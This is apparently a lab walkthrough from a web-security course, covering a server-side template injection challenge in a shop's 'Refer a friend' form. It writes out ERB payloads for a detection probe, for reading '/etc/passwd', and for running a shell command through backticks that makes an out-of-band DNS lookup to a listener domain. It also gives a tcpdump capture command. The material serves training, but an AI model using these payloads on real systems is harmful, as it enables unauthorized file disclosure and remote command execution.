Challenge URL: http://shop.webhacklab.com/referral.php

• Identify the template engine and exploit it to extract the content of the file
“/etc/passwd”

Solution:
Step 1: Notice the “Refer a friend” link in the Shop application, which points to
“http://shop.webhacklab.com/referral.php”

Step 2: Now fill in the details to check for injection. There is input validation on Name and Email;
however, Message accepts everything, so enter the following in the Message:

<%= 7*7 %>

Step 3: On clicking the “Refer a Friend” button, the application will render the ERB template and
send an email, as shown below:

Step 4: Inject another code with the content:

<%= File.open('/etc/passwd').read %>

Step 5: On clicking the “Refer a Friend” button, the application will email the contents of the file
“/etc/passwd”, as shown below:

Step 6: OOB calls can also be made through this vulnerable parameter. Make sure a DNS listener is
started on the Kali box and inject the code below in the Message text (with a backtick ` and not a
single quote ‘):

<%= `nslookup superspam.userX.webhacklab.com` %>

Step 7: Start tcpdump on your Kali VM to capture DNS requests, using the following command:

root@Kali:~# tcpdump -n udp port 53 -i any

Step 8: Once the request is sent, the DNS requests are being received by the host.

END OF PART - 2
